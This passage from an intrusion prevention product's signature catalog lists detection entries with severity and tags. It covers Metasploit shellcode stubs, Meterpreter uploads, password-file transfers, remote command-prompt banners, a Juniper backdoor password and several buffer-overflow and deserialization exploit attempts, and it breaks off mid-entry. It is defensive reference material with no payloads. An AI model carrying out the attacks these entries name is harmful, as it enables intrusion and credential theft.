First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A network connection launched by the Windows system process setup_wm.exe was detected. Setup_wm.exe is used for setting up Windows Media Player.
Back to top

Sex

About this situation: Sites that depict or graphically describe sexual acts or activity, including exhibitionism; sites offering direct links to such sites.
Context: URL Application Context
Severity: 1
Tags: Adult Material, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that depict or graphically describe sexual acts or activity, including exhibitionism; sites offering direct links to such sites.
Back to top

Sex Education

About this situation: Sites that offer information about sex and sexuality, with no pornographic intent.
Context: URL Application Context
Severity: 1
Tags: Adult Material, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer information about sex and sexuality, with no pornographic intent.
Back to top

SF-Fire-Credit-Union

About this situation: Application SF-Fire-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SF Fire Credit Union is a credit business company.
Back to top

Sfax

About this situation: Application Sfax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sfax is internet fax service with digital signature. Designed originally for healthcare, Sfax is a completely secure cloud fax service and is also SOX compliant and GLBA compliant.
Back to top

SFshare

About this situation: Application SFshare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SFshare - Smart Cloud Storage.
Back to top

SFTP_Command

About this situation: SFTP Command Executed
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An SFTP command was processed.
Back to top

SFTP_File_Open_Denied

About this situation: Forbidden SFTP File Open
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An attempt was made to open a file over SFTP.
Back to top

SFTP_Request_Denied

About this situation: SFTP Whitelist Violation
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied by SFTP Whitelist.
Back to top

Shape-5

About this situation: Application Shape-5 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shape 5 is the Joomla Template and Wordpress club.
Back to top

Share-a-Refund

About this situation: Application Share-a-Refund detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Share a Refund is the way to get refunds from FedEx and UPS for late packages. The app provides an easy setup and comprehensive tools to make refunds.
Back to top

Share-it!

About this situation: Application Share-it! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Share-it - a MyCommerce solution that focuses on B2B ecommerce and global ecommerce
Back to top

Shareaholic

About this situation: Application Shareaholic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shareaholic is an all-in-one content amplification and monetization platform, that includes related content recommendations, promoted content, social sharing, following, site monetization apps such as affiliate linking, and social analytics. This module makes it a snap for any website to engage and grow their traffic, market their content, gain insights, and monetize their traffic, all from one easy-to-use dashboard.
Back to top

Shared

About this situation: Application Shared detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shared helps people connect and share anything from anywhere.
Back to top

Shared-groups

About this situation: Application Shared-groups detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Shared contacts is a simple way to share your domain contacts with your colleagues or your different Google accounts. Shared contacts application works with all editions of Google Apps.
Back to top

Shared-UDP_CS-BitTorrent-Network-Connect

About this situation: BitTorrent p2p network connection attempt
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub

About this situation: Metasploit mipsbe/byte_xori shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub

About this situation: Metasploit mipsle/byte_xori shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-PPC-Longxor-Stub

About this situation: Metasploit ppc/Longxor shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub

About this situation: Metasploit sparc/longxor_tag shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub

About this situation: Metasploit x86/context_cpuid shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Stat-Stub

About this situation: Metasploit x86/context_stat shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-Metasploit-Shellcode-x86-Context-Time-Stub

About this situation: Metasploit x86/context_time shellcode encoder stub detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_CS-x86-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared-UDP_Executable-File-Transfer

About this situation: Executable file transfer detected
Context: Any UDP Packet
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-374-4219
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

Shared-UDP_NSS-Boping

About this situation: NSS-Boping
Context: Any UDP Packet
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-371-4219
Description:
Back to top

Shared-UDP_ShellCode-AIX-Execve

About this situation: Shellcode
Context: Any UDP Packet
Severity: 10
Tags: AIX, Any Hardware, AIX not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Generic-AIX-ShellCode
Description:
Back to top

Shared-UDP_SunRPC-EMC-NetWorker-Librpc.dll-Security-Check-Bypass

About this situation: An attempt to exploit a vulnerability in EMC Legato NetWorker detected
Context: Any UDP Packet
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2011, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: EMC-NetWorker-Librpc.dll-Security-Check-Bypass
Description:
Back to top

Shared-UDP_System-Password-File-Transfer

About this situation: Detected an attempt to transfer system password file
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: HTTP_System-File-Access
Description:
Back to top

Shared-UDP_TFTP-Usage

About this situation: TFTP usage detected
Context: Any UDP Packet
Severity: 2
Tags: Any Operating System, Any Hardware, Generic TFTP server, Any Operating System not specific, Generic TFTP server not specific, Remote Control
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: TFTP-Usage
Description:
Back to top

Shared-UDP_Yokogawa-CENTUM-Denial-Of-Service

About this situation: Yokogawa CENTUM CS 3000 Remote Denial of Service
Context: Any UDP Packet
Severity: 7
Tags: Windows, Any Hardware, Yokogawa CENTUM, CVE2014, Windows not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Yokogawa-CENTUM-Denial-Of-Service
Description:
Back to top

Shared_Alpha-ShellCode-Detect

About this situation: Possible ALPHA shellcode seen in a TCP connection
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Alpha, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_CS-100Bao-Query

About this situation: Detects queries made to 100bao p2p network
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, 100Bao, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-239-3038
Vulnerability: 100Bao-Peer-To-Peer-Network
Description:
Back to top

Shared_CS-BitTorrent-Network-Connect

About this situation: BitTorrent p2p network connection attempt
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-360-4219
Last changed: sgpkg-ips-943-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

Shared_CS-BitTorrent-Tracker-Request

About this situation: Detects queries made to BitTorrent trackers
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-667-5211
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

Shared_CS-Flash-Video-Upload

About this situation: Flash Video file upload detected
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Streaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Adobe-Flash-Media-Content
Description:
Back to top

Shared_CS-Generic-Shellcode-3

About this situation: Generic shellcode detection
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-HTTP-Basic-Authorization-With-Long-Username-Or-Password

About this situation: Possible attempt to overflow a HTTP server via a long username or password with a basic authorization header
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2003, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-373-4219
Vulnerability: Oracle-9i-Xml-Database-BOF
Description:
Back to top

Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution

About this situation: An attempt to exploit a vulnerability using JRMI detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Apache-Commons-Collections-Object-Deserialization-Code-Execution-Vulnerability
Solarwinds-Virtualization-Manager-Apache-Commons-Deserialization
Description:
Back to top

Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution-2

About this situation: An attempt to exploit a vulnerability using JRMI detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-706-5211
Vulnerability: Apache-Commons-Collections-Object-Deserialization-Code-Execution-Vulnerability
Description:
Back to top

Shared_CS-Java-Rmi-Usage

About this situation: An attempt to use a Java Remote Method Invocation service detected
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-1008-5242
Vulnerability: Apache-Commons-Collections-Object-Deserialization-Code-Execution-Vulnerability
Description:
Back to top

Shared_CS-Metasploit-Meterpreter-Upload

About this situation: Metasploit Meterpreter upload detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-554-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-Mipsbe-Byte-Xori-Stub

About this situation: Metasploit mipsbe/byte_xori shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-Mipsle-Byte-Xori-Stub

About this situation: Metasploit mipsle/byte_xori shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-PPC-Longxor-Stub

About this situation: Metasploit ppc/Longxor shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-Sparc-Longxor-Tag-Stub

About this situation: Metasploit sparc/longxor_tag shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-x86-Context-Cpuid-Stub

About this situation: Metasploit x86/context_cpuid shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-x86-Context-Stat-Stub

About this situation: Metasploit x86/context_stat shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Metasploit-Shellcode-x86-Context-Time-Stub

About this situation: Metasploit x86/context_time shellcode encoder stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-683-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-Suspicious-Windows-API-Stub

About this situation: Suspicious Windows API call stub detected
Context: Any TCP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1188-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-System-Password-File-Transfer

About this situation: Detected an attempt to transfer system password file
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: HTTP_System-File-Access
Description:
Back to top

Shared_CS-Universal-Plug-And-Play-Request

About this situation: An attempt to use Universal Plug And Play was detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-490-5211
Vulnerability: Universal-Plug-And-Play-Request
Description:
Back to top

Shared_CS-Windows-Command-Prompt

About this situation: Detects Windows command prompt banner
Context: Any TCP Client Stream
Severity: 10
Tags: Windows, x86, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-920-5242
Vulnerability: Windows-Command-Prompt
Description:
Back to top

Shared_CS-x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-x86-X61nop-Shellcode

About this situation: Shellcode x61 nop detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-920-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-x86-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

Shared_CS-XAR-File-Upload

About this situation: XAR archive file upload detected
Context: Any TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, XAR, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: XAR-Archive-File-Transfer
Description:
Back to top

Shared_EICAR-AntiVirus-Test-File

About this situation: Detected an EICAR antivirus test file
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

Shared_ELF-Executable-File-Download

About this situation: Executable file download detected
Context: Any TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

Shared_Executable-File-Download

About this situation: Executable file download detected
Context: Any TCP Server Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1179-5242
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

Shared_Executable-File-Upload

About this situation: Executable file upload detected
Context: Any TCP Client Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-405-4219
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

Shared_FTP-Long-Password

About this situation: Possible buffer overflow attempt against an FTP server with a long password
Context: Any TCP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2003, CVE2006, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-579-5211
Vulnerability: Oracle-9i-Xml-Database-BOF
Easy-File-Sharing-FTP-Server-BOF
Description:
Back to top

Shared_FTP-Long-TEST

About this situation: Possible buffer overflow attempt against an FTP server with a TEST argument
Context: Any TCP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2003, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-579-5211
Vulnerability: Oracle-9i-Xml-Database-BOF
Description:
Back to top

Shared_Gid-Root-Response-Detect

About this situation: Possible remote root access
Context: Any TCP Server Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, UID Response Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_HTTP-Proxy-Connect-To-HTTPS

About this situation: Proxy Connects to port 443 (SSL/TLS)
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Description:
Back to top

Shared_HTTP-Proxy-Connects-To-SMTP

About this situation: Proxy Connects to suspicious port
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Description:
Back to top

Shared_HTTP-Proxy-Connects-To-Suspicious-Port

About this situation: Proxy Connects to suspicious port
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Description:
Back to top

Shared_HTTP-Proxy-Proxies-FTP-Connection

About this situation: An FTP connection is being proxied via HTTP Proxy
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Description:
Back to top

Shared_HTTP-Proxy-Proxies-Gopher-Connection

About this situation: A Gopher connection is being proxied via HTTP Proxy
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-361-4219
Description:
Back to top

Shared_HTTP-Proxying-Detected

About this situation: A HTTP connection is being proxied via HTTP Proxy
Context: Any TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-326-4219
Description:
Back to top

Shared_Juniper-JunOS-Backdoor-Password

About this situation: Backdoor password
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

Shared_Malicious-Function-Name-In-Script

About this situation: A script calls a malicious function
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1179-5242
Description:
Back to top

Shared_Malicious-Metasploit-Function-In-Script

About this situation: A script calls a malicious function
Context: Any TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1179-5242
Description:
Back to top

Shared_Malicious-VBScript-Execution

About this situation: Malicious VBScript detected
Context: Any TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1280-5242
Vulnerability: Malicious-VBScript-Execution
Description:
Back to top

Shared_Microsoft-Cabinet-File-Download

About this situation: Cabinet archive file download detected
Context: Any TCP Server Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-288-4219
Vulnerability: Cabinet-Archive-File-Transfer
File-Type-Identification
Description:
Back to top

Shared_MIPS-ShellCode-Detect

About this situation: Possible MIPS shellcode seen in a TCP connection
Context: Any TCP Client Stream
Severity: 7
Tags: Any Operating System, MIPS, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

Shared_MS-SQL-Server-Pre-Authentication-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow in MS SQL Server user authentication function
Context: Any TCP Client Stream
Severity: 10
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server 2000, MS2002, CVE2002, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: MSSQL-MS-SQL-Server-Pre-Authentication-BOF
Description:
Back to top

Shared_Oracle-9i-XDB-FTP-Server-Unlock-BOF

About this situation: Attempt to exploit a buffer overflow in Oracle9i XDB FTP Server
Context: Any TCP Client Stream
Severity: 7
